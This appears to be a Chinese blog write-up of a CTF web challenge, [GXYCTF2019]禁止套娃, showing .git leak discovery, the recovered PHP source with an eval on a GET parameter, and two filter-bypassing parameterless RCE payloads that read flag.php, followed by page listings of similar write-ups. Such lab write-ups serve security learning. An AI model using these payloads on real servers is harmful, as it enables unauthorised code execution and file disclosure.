BUUCTF WEB [GXYCTF2019]禁止套娃

最新推荐文章于 2023-10-28 15:57:23 发布
最新推荐文章于 2023-10-28 15:57:23 发布
阅读量1.5k 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51412071/article/details/124349048
版权

BUUCTF WEB [GXYCTF2019]禁止套娃

  • 没有任何提示,使用dirsearch扫描

    # Dirsearch started Fri Apr 22 02:23:09 2022 as: ./dirsearch.py -u http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/ --delay=0.5 -t 3

301   185B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git    -> REDIRECTS TO: http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn/.git/
403   571B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git/
200   267B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git/COMMIT_EDITMSG
200    23B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git/HEAD
403   571B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git/branches/
200    92B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git/config
200    73B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git/description
403   571B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git/hooks/
......

    扫描到很多有关.git文件夹的路径,怀疑是.git泄露

  • 使用scrabble扫描

    ./scrabble http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81
hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint: 
hint:   git config --global init.defaultBranch <name>
hint: 
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint: 
hint:   git branch -m <name>
Initialized empty Git repository in /root/Tools/scrabble/.git/
parseCommit e729e0b15f06da388b0e634afffd19b8e17b572a
downloadBlob e729e0b15f06da388b0e634afffd19b8e17b572a
parseTree 964071070547c4dda8cf5e14da26e4d7b7aeeeb5
downloadBlob 964071070547c4dda8cf5e14da26e4d7b7aeeeb5
downloadBlob 7169422bf0676b5369d25776f03961e158428c90
HEAD is now at e729e0b init

    扫描到了index.php

    <?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

  • 第一层过滤

    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp']))

    过滤了一些PHP伪协议

  • 第二层过滤

    if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))

    这里的(?R)表示引用当前的表达式,(?R)?表示可以有零次或一次引用,可以匹配

    print(echo(1))

    等由字符和括号嵌套组成的字符串

  • 第三层过滤

    if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp']))

    过滤了一些关键字

方法1 session_id

?exp=highlight_file(session_id(session_start()));

同时抓包在Cookie中设置PHPSESSID

PHPSESSID=flag.php

方法2 scandir()

exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

current(localeconv())会返回.,然后使用scandir()函数扫描当前文件夹

localeconv()函数会返回包含本地数字及货币格式信息的数组,这个数组的第一个元素是.

current()函数返回数组中的当前元素的值,每个数组的初始指针都指向数组的第一个元素

array_reverse()函数以相反的顺序返回数组

next()函数将内部指针指向数组中的下一个元素并输出

Y1Daa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3471
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
BUUCTF [GXYCTF2019] 禁止套娃
nareku的博客
06-29 1391
这题对我这个小白来说好难理解,慢慢补坑吧。PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通。打开题目,只有如下:看源码也没有什么东西,常见的信息泄露:robots协议,备用文件,目录爆破,.git泄露都试试(看其他师傅的wp:也可以扫描后台,不太清楚为什么自己实操跑不出来有点奇怪),最后发现是.git泄露使用GitHack工具,py脚本跑一下得到后台源码: 得到的源码会留在工具所在的文件夹内,查看里面的index.php页面源码 解题过程: (一)在上面传送门的那个师傅的博
BuuCTF [GXYCTF2019]禁止套娃详解(两种方法)
最新发布
2301_76690905的博客
10-28 514
点入题目没有提示,常规抓包看源码扫目录,用dirsearch扫目录的时候扫出git第一眼看见第二个if语句,if(';R)?\)/', NULL, $_GET['exp']))可以看出这是典型的无参数rce,然后是后面的if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp']),这里限制了phpinfo(),getcwd()这些函数用不了。
[GXYCTF2019]禁止套娃--详解
金 帛的博客
06-12 2466
BUUCTF记录贴
BUUCTF-[GXYCTF2019]禁止套娃
yuqie的博客
04-06 256
对于第二个if,(?R)是引用当前表达式,(?\),可以迭代下去,那么它所匹配的就是print(echo(1))、a(b(c()));所以可以先利用函数array_reverse将数组反转,flag就在第二位了,再利用next指向第二位数组,在用文件显示包涵即可输出flag.php文件,构造payload。开始审计源码,我们最终的目标是执行@eval($_GET['exp']),从这开始瞄一下大佬的wp,因为我的脚本基础差的没眼看。pos(),传入数组,回显第一个数组的值,pos可以用current代替。
[GXYCTF2019]禁止套娃(无参数RCE)
记录学习,一起进步
01-19 1140
[GXYCTF2019]禁止套娃(无参数RCE)
俄罗斯套娃奖品Java程序
08-12
标题中的“俄罗斯套娃奖品Java程序”表明这是一个使用Java编程语言实现的程序,它可能与俄罗斯套娃这种玩具的概念相结合,创建出一种趣味性的计算模型或者游戏。俄罗斯套娃通常指的是一个大娃娃里面装着小一点的同款...
俄罗斯套娃
04-17
"俄罗斯套娃"这个标题可能是指一种特殊的数据处理或存储方式,它借鉴了传统玩具俄罗斯套娃的概念。在信息技术领域,这种比喻可能用于描述一种数据结构或者编程技巧,其中数据被嵌套在一个又一个的层次中,每个层级都...
俄罗斯套娃问题 回溯法
08-01
在“俄罗斯套娃问题”中,我们通常要考虑如何正确地将一系列大小不一的套娃放入有限的空间内,使得每个套娃都能完全装入另一个更大的套娃之中。 回溯法解决俄罗斯套娃问题的基本步骤如下: 1. **定义状态**:首先...
俄罗斯套娃奖品C++程序
05-19
在IT领域,编程竞赛是一种锻炼和展示编程技巧的常见方式,而“俄罗斯套娃奖品C++程序”就是一个这样的例子,它曾出现在中兴通信公司的“捧月杯”编程竞赛中。这个程序的设计和实现利用了C++这门强大的编程语言,展示...
别致的俄罗斯套娃广场.ppt
03-13
【标题】:“别致的俄罗斯套娃广场”实际上是指一个以俄罗斯传统工艺品——套娃为主题的广场,这可能是一个文化景点或者公共艺术空间。这个PPT可能是关于该广场的介绍或展示,包含了其设计特色、历史背景以及与套娃...
buuctf-[GXYCTF2019]禁止套娃 git泄露,无参数rce
2202_75317918的博客
10-05 1573
R)是引用当前表达式,(?表示可以有引用,也可以没有。,引用一次正则则变成了。用array_reverse把数组倒置,再用next默认返回第一个元素。无参数rce上次做ctfshow web40的时候刚碰到过。next()函数讲内部指针指向数组中的下一个元素,并输出。high_light或者show_source输出。用dirsearch扫一下,看到flag.php。类似这种可以括号和字符组成的,这其实是。,可以迭代下去,那么它所匹配的就是。基本一样,用上面的命令就可以。查看index.php。
buuctf-[GXYCTF2019]禁止套娃(小宇特详解)
小宇的web博客
02-12 1189
buuctf-[GXYCTF2019]禁止套娃(小宇特详解) 这里先看题 这里没有找到什么有用的信息,先使用dirsearch来爆破但是没有找到有用的,这时我就怀疑是有git泄露了这里使用githack探测发现了index.php 这里直接看源码吧 <?php 2 include "flag.php"; 3 echo "flag在哪里呢?<br>"; 4 if(isset($_GET['exp'])){//需要以GET形式传入一个名为exp的参数。如果满足条件会执行这个exp参数的
[BUUCTF刷题]禁止套娃
weixin_43952190的博客
07-01 2101
禁止套娃 exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); exp=show_source(array_rand(array_flip(scandir(pos(localeconv()))))); exp=show_source(session_id(session_start())); 进入后显示flag在哪儿,找不到线索,进行目录扫描。但也没有扫到。查看别人的wp发现是.git泄露。但是自己的网址下/.git
#WEB-buuctf-禁止套娃 1
weixin_52804141的博客
12-25 156
是一个黑名单绕过像et,na,info,dec,bin,hex,oct,pi,log,i不能使用。因为上述过滤的并未过滤 session_id() 所以我想到的使用 session_id来获取 flag。)时,可执行exp传递的命令。然后过滤了data协议,filter协议,php伪协议,phar。一,进入环境,在目录扫描未果,猜测可能是.git泄露,尝试一下。二,利用工具scrabble,果真是.git泄露。1,.git泄露,scrabble的使用。得到如下源码,开始代码审计。2,无参数RCE,通过。
wp-buuctf-禁止套娃(无参绕过)【多方法】
bin789456的博客
11-08 2138
wp 一开始没看到什么东西,那就开始找吧,常用备份,robots协议,目录爆破,git泄露慢慢试。 试了下git泄露,有东西了: 打开得到的index.php,源码如下: <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
[GXYCTF2019]禁止套娃
weixin_45751765的博客
11-25 389
0x00 前言 写这篇主要巩固一下正则,难度不是特别大 递归正则属于是盲区了 0x01 Sunwear 看看页面空空如也,抓包看看也是空空如也 果断扫一下 Githack一把梭 拿到index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET
BUUCTF Web [GXYCTF2019]禁止套娃1 & [BJDCTF2020]ZJCTF,不过如此1
网安小趴菜
09-20 412
BUUCTF Web [GXYCTF2019]禁止套娃1 & [BJDCTF2020]ZJCTF,不过如此1
ctfshow套娃shell
08-24
CTFSHOW套娃shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套娃shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值